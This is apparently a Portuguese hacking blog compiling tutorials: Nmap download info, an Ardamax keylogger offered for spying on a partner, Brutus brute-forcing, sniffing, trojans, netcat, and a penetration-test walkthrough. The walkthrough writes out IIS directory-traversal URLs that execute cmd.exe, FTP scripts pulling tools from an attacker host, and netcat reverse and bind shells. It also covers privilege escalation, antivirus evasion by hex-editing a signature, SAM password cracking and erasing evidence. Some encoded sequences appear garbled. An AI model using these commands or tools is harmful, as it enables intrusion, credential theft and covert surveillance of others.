Nmap é executado em todas as versões do Windows desde o Windows NT, incluindo 2K, XP, Vista, Windows 7 e Server 2003/2008. Por favor, leia aseção de Windows do Guia de Instalação para limitações e instruções de instalação para a versão Windows do Nmap. Em particular, ler sobre o Windows Especial 2000 (Win2K) as dependências se você usar essa plataforma. Você pode escolher a partir de um auto-instalador (incluindo dependências e também o Zenmap GUI) ou o muito menor da linha de comando versão do arquivo zip. O Nmap instalador executável do Windows pode segurar o WinPcap instalação, performance tweaks do registro, e descompactar os arquivos executáveis e arquivos de dados em sua posição preferida. Também inclui a interface gráfica Zenmap. Passar toda a complexidade dos arquivos zip Windows com um auto-instalador: Últimos desenvolvimento liberação auto-instalador: nmap-5.30BETA1-setup.exe
Últimas estável liberação auto-instalador: nmap-5.21-setup.exe
sexta-feira, 23 de abril de 2010
NMAP -SCANNERS
ARDAMAX -KEYLOGGER
Grave tudo o que for digitado no computador em um arquivo log. Desde senhas, e-mails até conversas de MSN. O arquivo log pode ser visto como texto ou página web. Utilize esta ferramenta para descobrir o que acontece no seu computador enquanto está fora, mantenha um backup do que você digita ou monitore o que a sua namorada anda conversando, descubra se aquele seu amigo fala mal de você pelas costas… Tamanho: 900 Kb Versão: 3.1 Formato: Rar
quinta-feira, 22 de abril de 2010
ATAQUES POR BRUTE FORCE -TUTORIAL
O que é? O ataque por brute force consiste em tentativas de descoberta de senhas/logins através de processos manuais ou automatizados. Os principais alvos são servidores de e-mails, servidores com Telnet ativo, FTP, HTTP com autenticação etc. Ninguém em sã consciência tentaria manualmente um ataque desses, isso demoraria muito e seria extremamente ineficaz. Para esse tipo de ataque existem várias ferramentas que automatizam o processo, nesse artigo analisaremos o Brutus. Onde conseguir? O Brutus pode ser baixado em diversos sites, inclusive aqui www.invasao.com.br. A instalação é muito simples. Descompacte e execute o arquivo executável, será mostrada a seguinte tela: Digite o ip ou o nome do servidor que se quer explorar no campo “Target”, ao lado dele informe o serviço que se deseja descobrir a senha, pode ser HTTP, FTP, Telnet, Pop3 etc. Na seção “Authentication Options” é feita a escolha da forma de pesquisa, primeiro informe o arquivo de nomes de usuários que está determinado no campo “User file”, assim é possível verificar vários logins de uma única vez, se preferir usar apenas um login, marque a opção “Single user” e informe o login desejado. Ao lado especifique de que forma as tentativas serão feitas, existem três possibilidades na opção “Pass Mode”: Word List – Com essa opção será necessário especificar um arquivo .txt com senhas possíveis, esse método é rápido, porém pouco eficaz. Brute Force – Com essa opção serão feitas diversas combinações com os caracteres especificados, esse método apesar de poder demorar muito, é muito eficaz. Programas como o Brutus são comuns na Internet, por isso é sempre adequado usar senhas com no mínimo 6 caracteres e usar caracteres alfanuméricos e numéricos. Ainda assim essas práticas não nos tornam imunes a esse tipo de ataque, portanto boa sorte!
Combo List – Aqui teremos que informar um arquivo .txt com logins e senhas possíveis separados por : ou
O QUE SÃO SNIFFERS -TUTORIAL
Os sniffers são programas que, como o próprio nome diz, “farejam”o que passa pela rede. Eles são usados freqüentemente por administradores de rede para identificarem pacotes estranhos “passeando” pela rede ou por pessoas má intencionadas para tentar descobrir informações importantes, especialmente senhas. Para utilizar um sniffer é indispensável que você esteja no mesmo segmento de rede que os dados que pretende capturar. Existem muitos sniffers disponíveis na Internet, nesse artigo vamos abordar o Ethereal, ele existe nas versões Windows/Linux/BSD/Mac dentre outros. Para conseguir o Ethereal procure em seu site oficial, http://www.ethereal.com. Não entraremos em detalhes de instalação, uma vez que isto está bem documentado no site oficial. Uma vez aberto o Ethereal você se deparará com uma tela como esta: Para iniciar os procedimentos de captura de pacotes, clique em Capture/Start, será mostrada esta tela: No primeiro campo selecione a placa de rede que está conectada no segmento de rede desejado. Os campos seguintes (Count/File size/Duration) se referem a quantidade de informação/tempo que a captura estará ativa. Lembre-se que esse processo exige muito da memória da máquina, portanto é interessante limitar a quantidade de dados que se deseja analisar. É importante marcar a opção Capture Packets in Promíscuos Mode, assim o Ethereal interceptará também os pacotes que não tenham sua máquina como destino. Dessa forma todos os pacotes que passarem por seu segmento de rede estará sujeito ao sniffer. Agora clique em ok e espere até conseguir pegar um número significativo de pacotes de rede. Depois mande a captura parar e serão mostrados os pacotes capturados, clique em algum deles com o botão direito e selecione a opção Follow TCP Stream. Será mostrada uma tela com a área de dados do pacote transformada em texto plano. Em nossos testes obtivemos a seguinte resposta: Como podemos ver é apenas a página do UOL, mas poderia ser uma conexão de e-mail a um servidor POP3 ou uma conexão Telnet. Por isso é importante usar recursos de criptografia em nossas transmissões, assim mesmo que os dados sejam capturados nunca serão decifrados.
O QUE SÃO TROJANS -TUTORIAL
O que são? Os Trojans-Horses(Cavalos de Tróia) ou simplesmente Trojans são programas recebidos como verdadeiros presentes de Grego, uma alusão ao cavalo de madeira dado de presente aos troianos que tinha o objetivo real de invadir as suas fortalezas. Portanto os Trojans são softwares criados com o intuito de dar acesso não autorizado a máquina da vítima, normalmente vêm disfarçados de programinhas úteis ou com títulos apelativos para induzir a sua execução. Como funcionam? Para permitir acesso a máquina da vítima é necessário que o software(o Trojan) abra uma conexão(porta) e fique em estado de alerta esperando a conexão do invasor. Eles rodam em background de forma totalmente furtiva e difícil detecção por usuários leigos. Um dos Trojans mais populares, apesar de antigo, é o NetBus, que continua fazendo verdadeiros estragos na máquina dos incautos. Esta é a tela do cliente, ou seja, da máquina do invasor quando está conectado à vítima. Como podemos ver acima é possível fazer diversas operações com este Trojan, desde de operações simples como abrir a gaveta de CD-ROM da vítima ou manda-lo para uma página da Web até acessar seus arquivos. Como detectá-los e removê-los? Como vimos no exemplo acima para conexão é necessário uma porta em estado de espera(Listen), no nosso caso a porta 12345. Para verificar quais programas são usados para abriri conexões, use o Fport, um software para Windows XP/NT/2000 que mostra as portas abertas e os aplicativos responsáveis por elas. Assim é possível apagar nossos “vilões”. Uma outra forma é verificar seus sinais através apenas de porta abertas, para isso vamos utilizar um escaneador muito poderoso, o Languard. Assim é possível saber se existe a porta 12345 está aberta. Hoje em dia a maioria dos antivírus detectam ao Trojans, basta manter sua barreira atualizada e desconfiar sempre dos “presentinhos” que nos chegam, principalmente por e-mail. No próximo artigo veremos aspectos mais avançados dos Trojans e como eles são criados, não perca!
ANALISE DE TESTE DE INTRUSÃO -TUTORIAL
Um consultor, com conhecimento limitado sobre a estrutura e organização de uma corporação, pode simular uma situação real de um cracker tentando obter acesso a um ambiente. A este tipo de avaliação damos o nome de Teste de Intrusão. Seguir será mostrado e comentado um teste de intrusão realizado por um consultor de segurança e disponibilizado na Internet. A organização avaliada é uma empresa no ramo de comunicação, com emissoras de TV, Rádio e Jornais. Estas são as principais ferramentas utilizadas: Cyberkit – DNS lookups, traceroute, whois, finger; a) Obtendo informações O ataque começou com DNS lookups nos IPs da empresa, requisições whois e varredura de portas nos servidores publicados na Internet. Foram localizados 140 computadores (servidores Web, DNS, e-mail e B2B), sendo que a maioria deles eram servidores NT e outros eram versões de UNIX. Uma varredura rápida nos servidores Web mostrou que eram utilizados servidores com IIS(Internet Information Server) 3.0 e 4.0. Como em todo ataque real, este Teste de Intrusão começou com a obtenção de informações a respeito do alvo. O software Cyberkit foi utilizado numa varredura inicial, todos computadores que estão ligados à Internet foram identificados, bem como seus sistemas operacionais e versões dos serviços instalados. b) Encontrando Vulnerabilidades O trabalho começou com o principal servidor Web da empresa (NT 4.0 com IIS 4.0). Uma rápida verificação na lista de vulnerabilidades conhecidas no site SecurityFocus, mostrou que a vulnerabilidade “Directory traversal using Unicode vulnerability” está presente em algumas versões do IIS. Esta vulnerabilidade é explorada enganando o servidor Web para que ele permita o acesso aos diretórios do computador que normalmente estariam ocultos aos visitantes do site. No IIS o diretório padrão para os sites é localizado em C:\Inetpub\wwwroot. Logo, ao invés de requisitar o documentohttp://www.vitima.com/index.html, que corresponde ao arquivo físico C:\Inetpub\wwwroot\index.html, o hacker requisita alguma coisa comohttp://www.vitima.com/../../index.html, que corresponde ao arquivo C:\index.html. Não existe um arquivo index.html no diretório C:, mas a partir de lá qualquer outro arquivo cuja a localização seja conhecida poderia ser acessado, tomando-se por base uma instalação padrão. Por exemplo, o programa cmd.exe poderia ser utilizado para executar comandos arbitrários no servidor, como se o hacker tivesse sentado na frente do computador e digitando comandos em uma janela DOS. Contudo, para que essa vulnerabilidade possa ser explorada, seria necessário ter direitos de execução e a seqüência de caracteres /../.. deveria ser substituída pelo equivalente em Unicode. Logo, ao invés de requisitar o cmd.exe do C:\Inetpub\wwwroot seria necessário fazer isso a partir de C:\Inetpub\wwwroot\scripts, sendo preciso mais uma camada de /... Esses caracteres devem ser traduzidos para o Unicode, pois o IIS filtra estes tipos de caracteres. Para executar o comando “dir c: /s” no servidor, por exemplo, deverá ser requisitada a URL: http://www.vitima.com/..%1c%pc../winnt/system32/command/cmd.exe?c+dir+c:\+/s Nesse comando, o caractere + substitui o caractere de espaço, e o ?/c+ é necessário para passar parâmetros para o cmd.exe, e /.. é representado em Unicode como %1c%pc. Executando este comando, no navegador, será apresentada uma lista completa de todos os arquivos do drive C: do servidor. O mesmo processo pode ser executado para outras unidades do servidor. Com este recurso é possível executar diversos comandos, como ping e comandos net para mapear a rede interna, contudo, executar estes comandos com o navegador é muito trabalhoso, logo é mais conveniente criar um script para esta finalidade. De posse dos endereços dos servidores e das versões dos serviços instalados, é o momento de identificar falhas que permitam o acesso ao sistema. Uma falha foi encontrada em um dos grandes sites de segurança, o SecurityFocus. Entendida a falha e como ela pode ser explorada, é hora de começar o ataque propriamente dito. c) Armando o Arsenal O primeiro passo do ataque é ativar um servidor FTP no laptop do atacante e copiar as ferramentas para o diretório principal do FTP. Foram copiados os arquivos nc.exe e hk.exe. Foi carregado um cliente FTP no computador da vítima para baixar as ferramentas do laptop. Como o FTP é interativo, e não é possível fazer a interação através de navegador, então foi criado um script para ser executado no servidor. Os comandos executados para criar o arquivo texto do script são mostrados a seguir: http://www.vitima.com/..%c%pc../winnt/system32/cmd.exe?/c+echo+open+ftp.intruder.com+ >>ftp.txt O conteúdo do script foi verificado através do navegador, e depois a seção FTP foi estabelecida, assumindo-se que o firewall permitiria aquele tráfego. O script foi executado com o seguinte comando: Depois foi usado o NetCat para obter um prompt de comandos no servidor. O NetCat é uma ferramenta de rede muito útil, que pode ser utilizada para permitir a comunicação via uma porta TCP qualquer e criar um shell prompt. O NetCat foi executado no laptop no modo de escuta(listening) na porta 53, também usada para consultas DNS e normalmente permitida pelo firewall. Depois foi executado o NetCat no servidor para disponibilizar o shell prompt no laptop, tudo através do navegador. Numa janela DOS do laptop foi dado o seguinte comando: Nc –l –p 53 E no navegador: http://www.vitima.com/..%c%pc../winnt/system32/cmd.exe?/c+nc+-d+-e+cmd.exe+MeuEndereçoIP+53 Então a janela do laptop mostrou: Microsoft(R) Windows NT(TM) C:\Inetpub\wwwroot\scripts>_ Pronto, ganhamos um prompt. Utilizou-se o comando whoami para identificar qual era o usuário logado na máquina. Infelizmente era o INET_IUSR/Anonymous, a conta de usuário anônimo da Internet e não a de administrador. Isso significa que as informações importantes não poderão ser acessadas. É necessário, além do conhecimento sobre protocolos e sistemas operacionais, entendimento sobre o funcionamento dos softwares que explorarão as falhas encontradas. Aqui o consultor usou um servidor FTP em seu laptop e um cliente no servidor para baixar as ferramentas para o alvo. O NetCat serviu para abrir uma conexão inicial. A porta de comunicação foi acertadamente escolhida, as requisições DNS, necessárias ao funcionamento do servidor, não despertavam suspeitas e podiam passar desapercebidas pelo Firewall ou IDS(Intrusion Detection System – Sistema de Detecção de Intrusão). d) Efetuando o Ataque Então o consultor tentou iniciar uma conexão TELNET usando uma outra porta com a ferramenta hk.exe. Esta ferramenta explora uma vulnerabilidade associada a uma chamada não documentada de uma API que permite a uma thread obter um token(um atributo de segurança que define o nível o nível em que uma thread pode rodar) de uma thread do kernel. Para usar esta ferramenta, digita-se hk seguido do comando que se deseja executar se tivesse o privilégio de administrador. O comando digitado foi: Hk nc –e –e cmd.exe MeuEnderecoIP 23 O resultado foi a mensagem de “Bad command or filename” . Depois de algumas verificações, vimos que o arquivo hk.exe tinha sido movido para o diretório C:\Program Files\Antivyrtec Associates\Antivírus\Quarantine\. O Antivírus havia identificado e capturado nosso aplicativo. Foi utilizado um editor hexa no arquivo hk.exe. Como este é um aplicativo compilado, qualquer modificação poderia comprometer seu funcionamento. Dentro do código foi editada uma mensagem que dizia “Your wish is my command master”. Foi mudada esta mensagem para “XXXX XXXX XX XXXXXXXX XXXXXX” e renomeado este arquivo para hk2.exe. Depois de baixar este arquivo o antivírus não o capturou. Dentro de uma nova janela DOS no laptop foi criada uma nova conexão com o seguinte comando: Nc –l –p 23 E depois o comando: Hk2 nc –d –e cmd.exe MeuEnderecoIP 23 Na conexão ativa no servidor Web foi mostrado: Hk2 nc –d –e cmd.exe MeuEnderecoIP 23 Lsass pid & tid are: 50 - 53 Lauching line was: nc –d –e cmd.exe MeuEnderecoIP 23 XXXX XXXX XX XXXXXXXX XXXXXXNTImpersonateClientOfPort Suceeded Na tela do laptop foi exibido: Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\Inetpub\wwwroot\scripts> Whoami NT AUTHORITY/SYSTEM Agora foi fechada a primeira conexão NetCat, ela não era mais necessária. A primeira coisa a ser feita foi a cópia do banco de dados SAM para o laptop e a quebra das senhas pelo aplicativo l0phtcrack, com dicionários de senhas e força bruta. Com alguns pings e comandos net todos os domínios e servidores NT foram listados. Foram colhidas todas as evidências da intrusão e por último foi instalado no servidor Web o WinVNC, o mais espantoso foi, após visualizar a tela do servidor, que a mensagem de captura do aplicativo hk.exe ainda estava na tela, ou seja, durante nossos testes(quase três dias) ninguém olhou para a tela do computador. O consultor então clica em OK e assim removeu a evidência mais óbvia de sua intrusão, além de apagar os arquivos que havia copiado anteriormente. Através de outra falha, desta vez numa API do Windows, foi possível aumentar o nível de acesso do consultor e obter privilégio de administrador. O antivírus foi facilmente enganado simplesmente editando o arquivo e mudando apenas um banner de boas vindas, quebrando assim o sistema de identificação de assinaturas. Uma conexão privilegiada foi estabelecida e as provas da intrusão foram coletadas. A partir deste servidor, outras máquinas foram exploradas e então finalmente o consultor deixa o sistema. e) Conclusão Ao analisar vários ataques, muitas semelhanças podem ser encontradas. Certamente uma delas é a seqüência que eles obedecem. O consultor seguiu a ordem normal e começou com varreduras e obtenção de informações, depois passou a procurar vulnerabilidades e como explorá-las, e finalmente efetuou o ataque e buscou evidências da intrusão. Note que todo o teste foi feito sem conhecimentos privilegiados, parecendo assim um ataque real. As falhas de programas foram exploradas intensamente nesse teste. O servidor Web tinha uma vulnerabilidade conhecida há bastante tempo e sua correção já estava disponível, bastava apenas uma atualização do software para impedir a ação do atacante. Outro fato é a ampla divulgação de falhas de segurança em sites especializados, muitas vezes essas atualizações acontecem muito depois de sua divulgação, quando a exploração dessas mesmas falhas já ocorreu. Com este teste foi possível verificar também que apenas uma falha em um dos servidores comprometeu a segurança inteira da estrutura, confirmando aquela máxima, comum na área de segurança, que diz: ”A corrente é tão forte quanto seu elo mais fraco.” A negligência dos administradores também pode ser observada pela não percepção do ataque, além da falta de atualização dos softwares, principalmente dos serviços críticos, como o servidor Web.
NetCat – Abre conexões TCP;
Hk.exe – Permite obter acesso de nível privilegiado no Windows NT.;
Comandos net – net view, net send, net share etc;
Editor hexa – Edita arquivos em formato hexadecimal;
Whisker.pl – Procura vulnerabilidades em servidores Web;
Lophtcrack – Quebra senhas do Windows;
WinVNC – Software de controle remoto.
http://www.vitima.com/..%c%pc../winnt/system32/cmd.exe?/c+echo+username>>ftp.txt
http://www.vitima.com/..%c%pc../winnt/system32/cmd.exe?/c+echo+password>>ftp.txt
http://www.vitima.com/..%c%pc../winnt/system32/cmd.exe?/c+echo+prompt>>ftp.txt
http://www.vitima.com/..%c%pc../winnt/system32/cmd.exe?/c+echo+bin>>ftp.txt
http://www.vitima.com/..%c%pc../winnt/system32/cmd.exe?/c+echo+mget+*.exe>>ftp.txt
http://www.vitima.com/..%c%pc../winnt/system32/cmd.exe?/c+echo+bye>>ftp.txt
http://www.vitima.com/..%c%pc../winnt/system32/cmd.exe?/c+ftp+-s:ftp.txt
(C) Coypright 1985-1996 Microsoft Corp.
USANDO O NETCAT -TUTORIAL
É lugar comum dizer que o Netcat, um pequeno software desenvolvido inicialmente para Unix, é o canivete suíço do TCP/IP. Existem atualmente versões do Netcat para Windows, porém é muito fácil encontrá-la na maioria das distribuições Linux. Mas qual o motivo dessa fama e a verdadeira utilidade dessa ferramenta? A grosso modo a maior utilidade dessa ferramenta é estabelecer uma conexão TCP entre dois hosts. Vamos a exemplos práticos, por exemplo um servidor POP de e-mail escuta na porta 110, como o Netcat pode se conectar em qualquer porta, basta usar o comando: nc –vv ip-do-servidor 110 Pronto, está estabelecida a conexão! Porém é necessário saber o que o servidor espera receber, ou seja, quais os comandos válidos nessa conexão. É como bater na porta de um chinês, é necessário conhecer seu idioma para conseguir se comunicar. No caso de um servidor de POP nós sabemos que é esperado em primeiro lugar um usuário e senha válidos. Portanto, depois de estabelecida a conexão, utilize os comandos: C:\windows> nc –vv ip-do-servidor 110 retr 1 (Use este comando para visualizar a mensagem 1) Vamos a outro exemplo, desta vez em um servidor Web. Como sabemos, normalmente os servidores Web não requerem autenticação, portanto qualquer um pode recuperar as páginas ali armazenadas. Utilize o Netcat dessa forma: nc www.site-qualquer.com.br 80 Depois de conectado, usamos um comando válido (GET) do servidor Web para visualizar o conteúdo da página inicial, assim: GET index.html Note que o código HTML foi mostrado em seu console, a única diferença entre esse processo e seu navegador é que o último consegue interpretar esse código e mostrar de forma agradável o conteúdo. Esses dois são exemplos simples do uso do Netcat como cliente de duas aplicações. Esse objetivo seria tingido também com o uso do Telnet. Porém o Netcat apresenta recursos bem mais úteis, como veremos a seguir. Um dos exemplos mais interessantes do uso do Netcat é a possibilidade de criar um serviço escutando em uma determinada porta, isso é conseguido com o parâmetro –l. Vamos a mais um exemplo: nc –l –e cmd.exe –p 53 Este comando colocará um serviço ativo na porta 53 (-p 53), em estado de escuta (-l) e usando o interpretador de comandos do Windows 2000/XP (-e cmd.exe). Para se conectar a esta máquinas basta de outro computador usar o Netcat assim: Pronto! Agora você pode usar console da outra máquina como se estivesse sentado em frente a ela. Este exemplo pode ser ajustado perfeitamente para outros sistemas operacionais, no Linux, por exemplo, basta trocar o parâmetro –e cmd.exe por –e /bin/sh. Bom, esses foram os primeiros exemplos de uso desta fantástica ferramenta. Em breve estarei detalhando recursos mais avançados do Netcat, não percam!
+ok Ready
user andre
+OK Password required for andre
pass minha-senha
+OK andre has 06 visible messages (0 hidden) in 521825 octets.
list
1 3973
2 4081
3 9705
4 442395
5 4381
6 4114
..
quit
nc –vv ip-da-outra-maquina 53